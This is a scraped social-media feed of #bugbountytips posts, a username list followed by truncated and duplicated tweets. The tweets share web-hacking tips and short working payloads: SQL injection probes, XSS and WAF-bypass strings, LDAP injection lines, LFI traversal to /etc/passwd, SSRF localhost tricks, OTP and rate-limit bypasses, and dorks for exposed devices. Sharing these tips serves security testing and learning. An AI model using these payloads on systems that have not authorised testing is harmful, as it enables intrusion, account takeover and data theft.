from_user

TheMuztahidul

TheMuztahidul

ret2basic

xumut00_

700_isnuoT

sentinelleFr

VinayKu80824352

x_Hoque

sentinelleFr

noobie_maniac
700_isnuoT

sentinelleFr

sentinelleFr

sectest9

sentinelleFr

vanshitmalhotra

sentinelleFr

riomulyadi_

t1nd19d

Darkness_E1

realkartiks

sentinelleFr

sentinelleFr

jodelak
sentinelleFr

sectest9

sentinelleFr

sentinelleFr

UneekVivek

nafisaqil832

sectest9

618Slava

bsidesahmedabad

UneekVivek
micha3lb3n

UneekVivek

UneekVivek
Aj_louni

Savan_77

Maulik1827

IncScripts

SSXman2

WebSecurityIT

assasinflyer

nafisaqil832

javisenberg
cybersec_feeds

Zero0x00

arp_29

Haroldperkin250

seckteck

tech_naivi

tech_naivi

Bhagavan_bolli

ChavdaZeel
sectest9

pr0gr35528

pr0gr35528

pr0gr35528

jattboe
cry__pto

cry__pto

x_Hoque

aubrey_lab

AaronCuddeback
x_Hoque

x_Hoque

aubrey_lab

hacback17

x_Hoque

x_Hoque

x_Hoque

laud3b

x_Hoque

x_Hoque

x_Hoque
sec_onee

x_Hoque

msabhishek97

sec_onee

frankmosigisi

cybersec_feeds

good_sector
good_sector

good_sector
CYBerSec_Freak

mohitkchandani

cybersec_feeds

cybersec_feeds
cybersec_feeds

dan_covic

sectest9

Nutritionist_AP

nodeQuotesBot

Kill__3r

cybersec_feeds

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

Nutritionist_AP

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

TechSG2

TechSG2

dynamicCISO

OttLegalRebels

th3hokag3

SSXman2

SatyamGothi

bountyhunter_fr
cybersec_feeds

cybersec_feeds

bountyhunter_fr

cybersec_feeds

techtrendingnow
rudr4_sarkar

bountyhunter_fr
bountyhunter_fr

HarryHSolo

cybersec_feeds

__ceraunophile_

__ceraunophile_

GeekScripts

bountyhunter_fr

bountyhunter_fr

plzmakelstb4shp
saadibabar
saadibabar

saadibabar

l_y_n_s

bountyhunter_fr

bountyhunter_fr

ReaLentLess79
bountyhunter_fr

wareeq_shile

mhsecure

wareeq_shile

saintmalik_

TheBugBot
cybersec_feeds

JMakopolo

fayis_vadakkan

itsdig
priyanshu_xo

iamkamaljeet418

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

roughwire

hackd00r

CharuDutt8

s3rgiomazari3go

tanmayn36

vanshitmalhotra
vanshitmalhotra

vanshitmalhotra

TheBugBot

PoundXI

bountyhunter_fr

streaak
bountyhunter_fr
KomodoGT
Jaffy___

WebSecurityIT

ssh0x00r

bountyhunter_fr
tanmayn36

bountyhunter_fr
F3RR4R1_R3D
abagdadi
Anticlue

Nutritionist_AP

D0rkerDevil

bountyhunter_fr

Faeeqjalali
jayeshmthakur

AldenAous

AldenAous

k1ss_n00b

hacback17

0sninja
harshbothra_
dynamicCISO

theloshackers

enoleriiand

bountyhunter_fr

AldenAous

cybersec_feeds

bountyhunter_fr
cyanpiny
laud3b

bountyhunter_fr

ja1sharma
CristiVlad25

JAX_MASTERS

AldenAous

sectest9

fluttbot

pwn0sec

Ranger_one_

TechSG2

TechSG2
theInfernobot

TechSG2

TechSG2

hsakarp_ilajna
hsakarp_ilajna

AldenAous

AldenAous

KalemaChris

firearmslawyer

0x61_

cybersec_feeds

theInfernobot

xxx_BUGGY_xxx

jsfairy

jsfairy

bountyhunter_fr
sectest9

JMakopolo

hsakarp_ilajna

bountyhunter_fr

KKTech7

chickflow0

WebSecurityIT

GainSec

iambeingjoker

vatsav990
bountyhunter_fr

iambeingjoker

iambeingjoker

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

WebSecurityIT
HarryHSolo

nodeQuotesBot

bountyhunter_fr

BeingjokerMeme

iambeingjoker

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

Nutritionist_AP

TechSG2

Nutritionist_AP

Nutritionist_AP

TechSG2

aye_robot

TechSG2
TechSG2

aye_robot

sectest9

TechSG2

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

TechSG2

aye_robot
aye_robot

nlognbot

aye_robot

aye_robot

saurabh_sam96

iambeingjoker

nodeQuotesBot

bountyhunter_fr

bountyhunter_fr

vNature0

haknfuk
bountyhunter_fr

sectest9

MrrFawadkhann

sectest9

bountyhunter_fr

safe_buffer
bbuerhaus

bountyhunter_fr
F3RR4R1_R3D

sectest9

CristiVlad25

JohnSno99347035

KKTech7

AldenAous

AldenAous

AldenAous

Nutritionist_AP

Alra3ees
bountyhunter_fr

bountyhunter_fr

Ayhemalfakhri

iambeingjoker

roughwire

bountyhunter_fr

iambeingjoker

bountyhunter_fr
gkhck_
SatyamGothi
bountyhunter_fr

gdattacker

dhakal_ananda

0xfsec

HertzCar

bountyhunter_fr

bountyhunter_fr

iambeingjoker

BeingjokerMeme
dan_covic

V3NOM_10

good_sector

sec_onee

bountyhunter_fr
ajdumanhug
salahelhossiny0

ajdintrejic
KomodoGT
AldenAous

Virdoex_hunter
vishnugadupudi
cry__pto

bountyhunter_fr
0xrudrapratap
k1ss_n00b
Nutritionist_AP

niravsikotaria

CYBerSec_Freak

bountyhunter_fr

TechSG2

bountyhunter_fr
laud3b

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

laud3b

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

laud3b

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
laud3b

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

laud3b

bountyhunter_fr

bountyhunter_fr
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

Nutritionist_AP

bountyhunter_fr

Nutritionist_AP

skypatil98

pdnuclei
Monish91888822

bountyhunter_fr

mythicalcmd

streetofhacker

maverickNerd

bountyhunter_fr

_sickwiz

R4JVE3R

InonShkedy

MrrFawadkhann
amrul_01

AkaaZaan

bountyhunter_fr

ssh0x00r

ShieldVoC
BeingBharatiyaa
qw0lz

Nutritionist_AP

TechSG2
TechSG2

TechSG2
Debian_Hunter
PoundXI

bountyhunter_fr
could_10

vishne0

nodeQuotesBot

gmccane
s3rgiomazari3go

bountyhunter_fr

cyberdefender5

joeldeleep
bountyhunter_fr

Sudhans42246878

0xMiracle
makash
pdiscoveryio

bountyhunter_fr

INR_0x0Ma5K

ryan_kl_ko
sameh_9_

bountyhunter_fr

sh0mbo

Xiloe_Dev

saqibarif1998

knassar702

0x0Cj
sw33tLie
debangshu_kundu

rnd_infosec_guy

TebbaaX

bountyhunter_fr

hajiraess

BotInfosec

BotInfosec

BotInfosec

BotInfosec

BotInfosec

BotInfosec
BotInfosec

BotInfosec

BotInfosec
_0nk4r_

AniruddhaKl

AndyInfoSec_

Jhaddix

Rajat_sharma111
_seecko

ExploitedSystem

tanmayn36

HackerOn2Wheels

neutrinoguy

joselbr5
sriramoffcl

hacktory1

roughwire

pxmme1337
Xer0Days

bountyhunter_fr

Digitalsanjog

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

bountyhunter_fr
SaitejaB171

SaitejaB171

chiraggupta8769

AldenAous

frankmosigisi

ssh0x00r

SecSummers

imnirfn
xploitprotocol

xploitprotocol

xploitprotocol

ssh0x00r

Tyr4ntSec
sillydadddy

OAcybersecurity
sectest9

fiddlycookie
AldenAous
muhamme16102088

muhamme16102088

muhamme16102088

mirac_dasmine
muhamme16102088

stokfredrik

Jhaddix

0xMiracle
AndyInfoSec_

sectest9

AniruddhaKl

caseyjohnellis
GainSec

TechSG2
TechSG2

nodeQuotesBot

TechSG2

TechSG2

TechSG2

TechSG2

TechSG2

EvMd15

r3dw0lf_sec

Michael1026H1
Akash0x01

sectest9

syauqqii

thedarkwayg

ArthusuxD

sectest9

striveben

sectest9

t1nd19d
bountyhunter_fr

bountyhunter_fr

bountyhunter_fr

mirhatx

pdiscoveryio

sectest9

Nutritionist_AP

Nutritionist_AP

TrainingBug

TrainingBug

daoud_youssef

bountyhunter_fr
RustySowers

Securityblog

plenumlab

bountyhunter_fr

CyberRitesh

bountyhunter_fr
text
RT @renniepak: Pretty happy with this one-liner to extract endpoints from JavaScript file

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s

#bugbountytips https://t.co/Z6Rv4hLnUC
RT @chiraggupta8769: shodan search org:"Target" http.favicon.hash:116323821 --fields
#bugbountytips
#bugbountytip By @K4r1it0 https://t.co/HLVXbYWfey
RT @pwntheweb: This is how I found sql-Injection 100% of the time
For https://t.co/GIZTA591Y0

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
#bugbounty #BugBountyTips

RT @0xElkot: Recon Tip for :

-Subdomain enumeration
-Finding endpoints
-Finding parameters
#bugbountytips #BugBounty #reconnaissance https://t.co/IKr8ehNg24
RT @Naategh_: The number of zeros in http://127.0.0.1 doesn't matter, So we can use t
http://127.1
http://127.000000000000000.001
http://127.000.000.00000000000000001
...
#bugbounty #bugbountytips
RT @CharuDutt8: I just published How I was Able To bypass Cloudflare WAF https://t.co
#bugbountytips @_abhichimbalkar @deep803937 @chevonphillip @dybtron
RT @AldenAous: Top 25 Remote Code Execution (RCE) Parameters

#bugbountytips #bugbountytip #bugbounty https://t.co/2JI8LraxWV https://t.co/uL0

RT @musiclouderlml: my first #bugbountytips ,
the company's mail system can be vulnerable to homographs IDN ,
try to ask reset password for victim@example-com to victim@exàmple-com , if the backe
RT @trbughunters: ️Top 25 XSS Dorks according to OpenBugBounty ‍
‍
️ ️‍♂️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht

RT @chiraggupta8769: ️Ways to bypass rate limit ️By @fuxksniper
️️

#ethicalhacking #bugbounty #bugbountytips #bugbountytip https://t.co/robIZvKiiZ

RT @AldenAous: ⛓
️Get Reflected XSS within 3 minutes ⛓
️by:@gkhck_

https://t.co/ZSGoyAvqdo

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip

RT @cry__pto: Metasploit Community CTF 2020 Writeup.pdf:
https://t.co/EJ6Ox1fGYc

#Pentesting #Hacking #redteam #bugbountytips

RT @Bugcrowd: Want to make bug hunting your career, but hitting some blocks and uns

Take some tips and tricks from @ninad_mathpati in todays researcher spotlight! #ItTake
RT @TobiunddasMoe: My quick and basic recon routine for finding Subdomains while doi

#hackers #netsec #bugbountytip #bugbountytips #bugbounty #infosec #redteam #pen

RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/8w7MH3XHrJ
#BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops
#informationdisclosure #owasp https://t.co/8w7MH3XHrJ
RT @gkhck_: To be more successful in bug bounty ...[I think] A short but very effective s

*Take a break, Learn more and Try again

https://t.co/pgFf3xWxZH

#bugbountytips #bugbountytip #infosec

RT @chiraggupta8769: ️Accessing the Admin Panel tip ️By @SalahHasoneh1
️️

#bugbounty #bugbountytips #bugbountytip https://t.co/bgv4Dw7dOu

RT @pdnuclei: Done with subdomain enumeration? here is how you can get more assets

#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips https://t.

RT @mariusshoratau: Have you heard about AlienVault OTX? You can use it to get easy b

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking ht

RT @jodelak: Github dorks for finding secret data..

#bugbountytips #Security #Network #infographics

#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @r0bre: Proud to release ScriptFinder, a tool for automated JS file discovery!
https://t.co/cTpu4tBoh4
Thx to @TomNomNom @stokfredrik @hakluke @NahamSec @nnwakelam @zseano @EdO
#recon #hacking #infosec #bugbounty #bugbountytip #bugbountytips https://t.co/0A9
RT @avasdream_: So here is my repository of dockerized pentesting tools. This comes in
https://t.co/2ywul31IVH
#Pentesting #Docker #Dockerfile #Containers #BugBounty #BugBountyTip #bugbounty
Github dorks for finding secret data..

#bugbountytips #Security #Network #infographics

#hacker #malware #cybercriminal #botnet #server #control #spam #hacking #Infosec
RT @emgeekboy: For all the hackers starting with bug bounty, here is how you can get r

#bugbountytips #recon #security

RT @_Rutik_Sangle_: #100daystolearnandimprove
Day 95:
1. Continued Solving some more Authentication labs on @WebSecAcademy

2. Read some Authentication Bypass blogs:

https://t.co/PQOGxWzXJW
https://t.co/wcYOh8fO5N
https://t.co/ipor9FYcR5
https://t.co/iEAAzGnsJp

#infosec #bugbounty #bugbountytips

RT @Virdoex_hunter: web pentesting roadmap

https://t.co/gMuHryDZnt @ADITYASHENDE17 @stokfredrik @NahamSec @nehatarick @m
RT @TheHackersNews: << Interesting Case Study >>

How Bug Bounty Platforms—HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter—R

https://t.co/pWXnVycfNp

#infosec #pentest #bugbountytips #privacy #bugbountytip #cybersecurity #informatio

RT @gkhck_: #bugbountytips #infosec #bugbountytip

1 - Go Burp Suite / Target

2 - Select all items
3 - "Save selected items" (targets)
4 - https://t.co/2p02LqodqY -i targets -b -r ^/ -o cli https://t.co/gkzXmwJV4i
RT @knassar702: #PmG - Extract parameters/paths from urls

https://t.co/0Oah7JwH76
#bugbountytips #recon https://t.co/09hZn9fwvq
RT @618Slava: I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips https://t.co/xKJAuhjM8h
I often see that OSI knowledge is really needed!!
How much this knowledge is really needed? I can't find anything about their application
#BugBounty
#bugbountytips https://t.co/xKJAuhjM8h
RT @Aj_louni: Just a quick reminder the AMA by @bsidesahmedabad with the humble lov
#bugbounty
#bugbountytips
#stream https://t.co/p30ZP4gOnW
RT @laud3b: Find SSRF issues via inject headers (like x-forwarded-host,..etc) with this
.
https://t.co/C2E8XUKGRz
#bugbountytips #bugbounty https://t.co/OEkYLIt3YE
Broken link hijacking!

#bugbounty #bugbountytips https://t.co/Py2g24HxbZ

RT @SalahHasoneh1: ️Dorks for CVE-2020-3452 ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

RT @m4ll0k2: When you find a public form (contact form,etc.) try these payloads (blind
Just a quick reminder the AMA by @bsidesahmedabad with the humble lovely @thedawg
#bugbounty
#bugbountytips
#stream https://t.co/p30ZP4gOnW
RT @cry__pto: DOM XSS in Gmail with a little help from Chrome.pdf:
https://t.co/ADkttdw0r7
#bugbountytips #Pentesting #Hacking #redteam
RT @Zero0x00: Join us tonight at 9 pm for an intriguing live session with @thedawgyg
https://t.co/4aT4ldTgn6

Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
Bada maza ane wala hai !!!!
Do join us :)

#bugbountytips #hacking https://t.co/bMrUvr0kFk

RT @fayis_vadakkan: How to Bypass The Rate limiting✌️✌️

Add this header in to the post request with an IP address.

X-Forwarded-For: (Any IP Address )

#bugbountytips #bugbounty #vulnerability #Hackers #exploit

️RT @AldenAous: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️

#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #

RT @SalahHasoneh1: ️Using the password reset code more than once ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht

RT @laud3b: CloudFlare Origin Certificate

How to find out the real server IP hidden behind the Cloudflare CDN

443.https.tls.certificate.parsed.subject.common_name: CloudFlare Origin Certificate

#bugbountytips #bugbounty
RT @manas_hunter: Github dorks for finding secret data..
Happy hacking:)

#bugbountytips #infosec https://t.co/GOk9SvUQMt

RT @s3rgiomazari3go: Sublist3r is a tool designed to enumerate subdomains of website
https://t.co/20u5jZOPaR
#cybersecurity #hackingtools #bugbountytips https://t.co/3TLqEVmFaV
RT @SalahHasoneh1: ️Ways to bypass rate limit ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

Join us tonight at 9 pm for an intriguing live session with @thedawgyg on @bsidesahm
https://t.co/4aT4ldTgn6

Learn about tips & tricks about #bugbounty from his experience!
"Walla" "walla"
Bada maza ane wala hai !!!!
Do join us :)

#bugbountytips #hacking https://t.co/bMrUvr0kFk

RT @harshbothra_: It was great to have a talk with @dynamicCISO. In case if you misse

Slides: https://t.co/d77RbZXwqG

Stream: https://t.co/vrILyaZoLj

Thanks, @hacback17 for carrying this out.

#bugbountytips #bugbounty #websecurity #hacking #recon #bugcrowd

RT @laud3b: You can change WPEngine's config file on the WordPress blogs. Path "/_wp
#bugbountytips #bugbounty https://t.co/mwRqcvFj5p
RT @Jhaddix: Monday Night #BugBounty #bugbountytips

- Found 2 sites with source code disclosure via git.

- Struggled with git for a long while to extract files from objects.
- Audited some PHP
- Frustrated with git, going to bed =P
RT @bbuerhaus: Once I realized the trick to @adamtlangley's "I once was blind but now

TIL @PortSwigger's Burp Collab does SMTP!

This is insaaanely useful.

#bugbounty #bugbountytips https://t.co/1Xdo79FEUG

RT @AldenAous: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip https://t.co/Rf4Vfwmfp2 https://t.co/Lu

RT @SalahHasoneh1: ️Accessing the Admin Panel tip ️
️️

#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip #

RT @terjanq: I created a repository to keep track of cool XSS payloads https://t.co/EcV

Check this out!

#xss @XssPayloads #bugbountytips https://t.co/jH9tUS3GgW

RT @dhakal_ananda: Wanna know the best way to be demotivated in the bug bounty fie

Compare yourself with others!

#bugbounty #bugbountytips
RT @chiraggupta8769: Github Dorks For Finding Information Using Extension By @D0rke

#bugbounty #bugbountytip #bugbountytips https://t.co/WmTKTXqAR5

RT @chiraggupta8769: <?php var_dump(explode(',',ini_get('disable_functions'))); ?&

Handy as hell tip for checking which functions you need to by pass on PHP RCE.

Tip By @Random_Robbie

#bugbountytips #bugbountytip #bugbounty

RT @chiraggupta8769: Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot

#bugbountytips #BugBounty #bugbountytip https://t.co/CAemcyCGQn

RT @intigriti: Did you know you can get the source code of Electron apps by using this h
Metasploit Community CTF 2020 Writeup.pdf:
https://t.co/EJ6Ox1fGYc

#Pentesting #Hacking #redteam #bugbountytips

DOM XSS in Gmail with a little help from Chrome.pdf:
https://t.co/ADkttdw0r7
#bugbountytips #Pentesting #Hacking #redteam
RT @XSaadAhmedX: BugBountyTip: If you playing with `API ENDPOINT` always try to s

#bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH

RT @rapiddns: shodan dork

title:"SSL VPN Service"

"webvpnlogin=1"

Happy Hacking!
#bugbountytip #bugbountytips #bugbounty #cisco #vulnerability https://t.co/3As6Gw
RT @hacback17: Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Fre

https://t.co/QVFHjzbBPj
Coupon Code: COPSHOTMEINPORTLAND

#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm

RT @xalerafera: #bugbountytips #hackerone #bugbounty #recon

Find api links in subdomains, or how to find a simple SSRF in five minutes in a big compa

assetfinder --subs-only https://t.co/oBxOXg0ke5 | waybackurls | grep "?url="

Happy hacking https://t.co/6jFrG3l0Oy

RT @11xuxx: Horizontal priv escalation & full account takeover
1. registered a new user for my company at "/api/register/48e33445-f797-4e62-801f-e
2. changed the UUID to a numerical value -> "2"
3. user created under another company
4. full account takeover
#bugbountytips https://t.co/SsZd1UgEGP
RT @amanmahendra_: Shodan dork for CVE-2020-3452

“Set-Cookie: webvpn;”

#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #togetherwehithar

Hey, wanna learn #Python? "Automate The Boring Stuff" course is #Free for today with

https://t.co/QVFHjzbBPj
Coupon Code: COPSHOTMEINPORTLAND

#hack #girlswhocode #linux #security #bugbounty #bugbountytips #linux #programm

RT @MrCyberwarrior: Privilege Escalation
#bugbounty #BugBountyTips https://t.co/oqfqA8GVDX
RT @11xuxx: Wildcard bypass & LFI
1. Intercepted a POST req that pointed to a local file "/usr/local/redacted/filename"
2. tried "/etc/passwd" -> bad request
3. "/user/local/../../etc/passwd" -> bad request
4. "/user/local/redacted/../../../etc/passwd" -> OK
5. LFI & bounty

#BugBountyTips https://t.co/yNcqbr736R
RT @iambharat18: #BugBountyTips #bugbounty #SharingIsCaring Bug: 2FA Bypass-&gt
-- Sometimes "0000" can give the correct OTP response for every account and redirect y
You can change WPEngine's config file on the WordPress blogs. Path "/_wpeprivate/con
#bugbountytips #bugbounty https://t.co/mwRqcvFj5p
RT @poison_h1: This tip may be posted by someone before. However, I encountered this
#BugBountyTip #BugBountyTips #infosec https://t.co/utvdR0OqMU
RT @avanish46: After 2 days of struggling, Bypassed a strong XSS filter on one of the pr
[ No '>' was allowed , no Html tags, Character length 35 ]
XSS Payload used :-
<svg onload="alert(1)" <="" svg=""
@XssPayloads
#BugBountyTips #BugBounty https://t.co/T2bZQi9u10
RT @_heinthant: Got a survey from?
Don't only test for blind xss
Try this once

#bugbountytips https://t.co/w2jr5FMLec
RT @Virdoex_hunter: SSRF one liner Command(both mannual & automatic) and tip
More SSRF tips:
https://t.co/8GSH3POwb3 #bugbountytip #bugbountytips
@ADITYASHENDE17 @1ndianl33t @stokfredrik @dhakal_ananda @remonsec @trippy_bh
RT @alicanact60: Don't forget to check the responses. Maybe you can find some tokens l
I found a token in response and went to mailbox. The email verification link was xx+.com
And I saw they are same tokens!
#BugBountyTips #BugBountyTip https://t.co/Yncxc406hp
RT @SatyamGothi: NEW VIDEO ALERT🚨
Your Sunday dose of Information📖
The next one on the series, Identifying Technologies for your Targets!

https://t.co/qKr1pPXn2t

Trying to make sort of a Beginner friendly #BugBountyCourse! Do check it out❤️

Hope it helps :)
#bugbountytips #bugbounty
RT @stokfredrik: HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loo

August is going to be.. crazy!

feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec https://t.co/PAbmt6Zms6
i was testing for ssti on this page using this payload {{9-3}} and this the output am get
#bugbountytips
#bugbounty https://t.co/NCC8CJWYTF
RT @PoundXI: Two good articles about HTTP Request Smuggling.
1.https://t.co/trsGgcBCOg
2.https://t.co/BwoMkuigWi
#cybersecurity #bugbounty #bugbountytips
RT @Queseguridad: When auditing a SAP it is important to have a good dictionary, as it
RT @HusseiN98D: SSRF script requested by @Alra3ees
This script will take a domain and a callback server, append SSRF parameters and fire th
#BugBountytip #BugBountytips #BugBounty https://t.co/TOLtwDq8u1
RT @m4ll0k2: I found a lot SSRF issues via inject headers (like x-forwarded-host,..etc) w
https://t.co/YRJj4XR3av
By @hakluke

Will be helpful for new bug bounty hunters. Watch it out.

#bugbounty #bugbountytips #cybersecurity

RT @maverickNerd: I just published Android App Security & Testing https://t.co/cQ

It was long pending, found a draft in my notes, corrected it and thought why not share i

#androidsecurity #bugbountytips #bugbounty

RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/ALXAVUiIf7
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/ZVrslIQtoM
RT @vanshitmalhotra: #BugBounty #BugBountyTip #bugbountytips #penetrationtesting
#hackers #informationdisclosure #owasp https://t.co/othzLzOqx1
RT @lutfumertceylan: 🚀 How can you make a Javascript Polyglot for XSS? 🚀

#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://

RT @harshbothra_: XSS is pure love and combined with luck, it may give unexpected res

#bugbountytips #bugbounty #hacking #bugbountywriteups #security

RT @HackerHumble: OTP Verification bypass #5

1. Web app is sending a verification code to email before changing some sensitive fields

2. Intercepted the request in burp and found the email parameter (eg: email: victim@gm

#bugbountytips #bugbounty #hacking

RT @Kill__3r: Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty https://t.co/24zT3EBtmr
Noob question?
need help.
when I try to evaluate javascript: and eval: functions it is saying access to this page is d
#bugbountytips #bugbounty https://t.co/24zT3EBtmr
RT @CristiVlad25: What I consider the top two learning and testing books for #pentestin

#cybersecurity #bugbountytips #penetrationtesting

https://t.co/d9bPjpqcxH
RT @ShMalav: #bugbountytips
#bugbountytip
Subdomain Enumeration tip

Install https://t.co/v8eYrU0PhC
run this tool and get resolvers.txt as a result .
Now
Run subfinder from project discovery and use that file

subfinder -d domain_com -o result.txt -nW -v -rL resolvers.txt

😉 😉😉😉

RT @thedarkwayg: Yesterday I sent 5 submissions to @Bugcrowd .

Results: 2 Triaged, 3 Dups 😂😅.

WAF Bypass payload:

">'><details/open/ontoggle=confirm('XSS')>

#BugBountyTips #BugBounty https://t.co/qrSB4gyBKc

RT @_Y000_: #Dork para encontrar paginas vulnerables a #xss

Este ataca una #vulnerabilidad de un tema de #wordpress, el cual se llama: Fruitful

intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext

#CyberSecurity #hacked #bugbountytips https://t.co/xrbVbGGrX4

RT @_Y000_: Este es para encontrar dispositivos iCloud vulnerables, podemos ver todas

intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camer

*Nota: pueden modificar los parámetros otros resultados

#Cybersecurite #dork #bugbountytips https://t.co/7NPS5mjfWw

RT @shreyasrx: LDAP Injection 💥

1/3

Payloads :
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

#bugbountytips
#shieldindia

RT @rohit_sonii: Escalating Self XSS to Account Takeover by chaining multiple low level
https://t.co/KtSw3vi80q

#bugbountytips #bugbountytip #bugbounty #infosec #togetherwehitharder

RT @manas_hunter: #bugbountytips
#bugbounty
#infosec https://t.co/II4aQLxH0T
RT @GochaOqradze: #bugbountytip #bugbountytips
Today I bypass F5-Big waf with xss payload.

Interesting is %5K converted to "P" character.

In response source I got

"><P/onweel=alert(1)>mouse wheel here<!--

Payload:
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
RT @y0dhha: XSS Cheat Sheet
#xss #bugbounty #exploit #BugBountyTips #BugBountyTip https://t.co/zhc1VdddOO
RT @zedsec009: Cloudflare bypass & template injection to XSS in one shoot !

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

#bugbountytips
RT @0xVeera: Private Profile Disclosure - going beyond /wp-json/
The site was using Wordpress
I found various bypass techniques to access private user information.
#bugbountytips @Bugcrowd @SynackRedTeam
